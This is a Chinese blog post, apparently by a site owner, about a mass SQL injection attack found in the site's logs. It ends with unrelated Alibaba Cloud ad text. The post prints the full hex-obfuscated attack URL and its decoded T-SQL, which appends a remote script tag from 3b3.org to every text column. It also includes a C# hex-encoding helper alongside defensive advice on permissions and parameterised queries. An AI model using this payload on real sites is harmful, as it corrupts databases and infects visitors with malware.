建議大家封鎖這個IP,俺百度了一下,發現也有類似的人被攻擊。還好,俺的查詢語句都是採用參數,如果是拼湊的話,估計慘了。
這也給了俺們一個教訓,就是當你拼湊sql後不要有僥倖心理。
這是如下的連結地址:
http://www.kilonet.cn/web/Info.aspx?g=info&c=CT0147&id=200811240069';DeCLaRE@S NvArCHaR(4000);SeT@S=CaSt(0x4400650063006C0061007200650020004000540020005600610072006300680061007200280032003500350029002C0040004300200056006100720063006800610072002800320035003500290020004400650063006C0061007200650020005400610062006C0065005F0043007500720073006F007200200043007500720073006F007200200046006F0072002000530065006C00650063007400200041002E004E0061006D0065002C0042002E004E0061006D0065002000460072006F006D0020005300790073006F0062006A006500630074007300200041002C0053007900730063006F006C0075006D006E00730020004200200057006800650072006500200041002E00490064003D0042002E0049006400200041006E006400200041002E00580074007900700065003D00270075002700200041006E0064002000280042002E00580074007900700065003D003900390020004F007200200042002E00580074007900700065003D003300350020004F007200200042002E00580074007900700065003D0032003300310020004F007200200042002E00580074007900700065003D00310036003700290020004F00700065006E0020005400610062006C0065005F0043007500720073006F00720020004600650074006300680020004E006500780074002000460072006F006D00200020005400610062006C0065005F0043007500720073006F007200200049006E0074006F002000400054002C004000430020005700680069006C006500280040004000460065007400630068005F005300740061007400750073003D0030002900200042006500670069006E00200045007800650063002800270075007000640061007400650020005B0027002B00400054002B0027005D00200053006500740020005B0027002B00400043002B0027005D003D0052007400720069006D00280043006F006E007600650072007400280056006100720063006800610072002800380030003000300029002C005B0027002B00400043002B0027005D00290029002B00270027003C0073006300720069007000740020007300720063003D0068007400740070003A002F002F003300620033002E006F00720067002F0063002E006A0073003E003C002F007300630072006900700074003E0027002700270029004600650074006300680020004E006500780074002000460072006F006D00200020005400610062006C0065005F0043007500720073006F007200200049006E0074006F002000400054002C0040004300200045006E006400200043006C006F007300650020005400610062006C0065005F0043007500720073006F00720020004400650061006C006C006F00630061007400650020005400610062006C0065005F0043007500720073006F007200aS NvArChAR(4000));ExEc(@S);--
其實這個網站俺基本上都不去管了,因為沒時間去完善和打理它,俺加了線上人的活動記錄,可惜沒儲存到日誌裡。準備有空把日誌完善下。免得不明不白地中招。
轉換後的代碼是:
Declare @T Varchar(255),@C Varchar(255) Declare Table_Cursor Cursor For Select A.Name,B.Name From Sysobjects A,Syscolumns B Where A.Id=B.Id And A.Xtype='u' And (B.Xtype=99 Or B.Xtype=35 Or B.Xtype=231 Or B.Xtype=167) Open Table_Cursor Fetch Next From Table_Cursor Into @T,@C While(@@Fetch_Status=0) Begin Exec('update ['+@T+'] Set ['+@C+']=Rtrim(Convert(Varchar(8000),['+@C+']))+''<script src=http://3b3.org/c.js></script>''')Fetch Next From Table_Cursor Into @T,@C End Close Table_Cursor Deallocate Table_Cursor這是查詢這個IP的資料
駭客代碼SQL注入部分產生:
/// <summary>
///字串轉換為16進位
///using System.Text;
///using Microsoft.VisualBasic;
/// </summary>
/// <param name="Data"></param>
/// <returns></returns>
static string ToHexString(string Data)
{
StringBuilder sb = new StringBuilder("0x");
foreach (char c in Data)
{
sb.Append(Conversion.Hex((int)c)).Append("00");
}
return sb.ToString();
}
2、建立一個public許可權資料庫使用者,並用這個使用者訪問資料庫
3、去掉角色public對sysobjects與syscolumns對象的select存取權限
[使用者]使用者名稱稱-> 右鍵-屬性-許可權-在sysobjects與syscolumns上面打“×”
4、通過以下代碼檢測(失敗表示許可權正確):
DECLARE @T varchar(255),
@C varchar(255)
DECLARE Table_Cursor CURSOR FOR
Select a.name,b.name from sysobjects a,syscolumns b
where a.id=b.id and a.xtype='u' and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167)
OPEN Table_Cursor
FETCH NEXT FROM Table_Cursor INTO @T,@C
WHILE(@@FETCH_STATUS=0)
BEGIN print @c
FETCH NEXT FROM Table_Cursor INTO @T,@C
END
CLOSE Table_Cursor
DEALLOCATE Table_Cursor
在伺服器的IIS中,找到這個被掛馬的網站屬性,主目錄中―配置中---找到.asp及.aspx的影射,將裡面的中的HEAD操作與TRACE操作刪除,只保留GET與POST就可以解決,
注意刪除HEAD操作與TRACE操作完全不會影響正常的網站訪問.正常的網站並不需要這兩個操作
Start building with 50+ products and up to 12 months usage for Elastic Compute Service
1 on 1 presale consultation
24/7 Technical Support 6 Free Tickets per Quarter Faster Response
Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.
A comprehensive suite of global cloud computing services to power your business
Payment Methods We Support
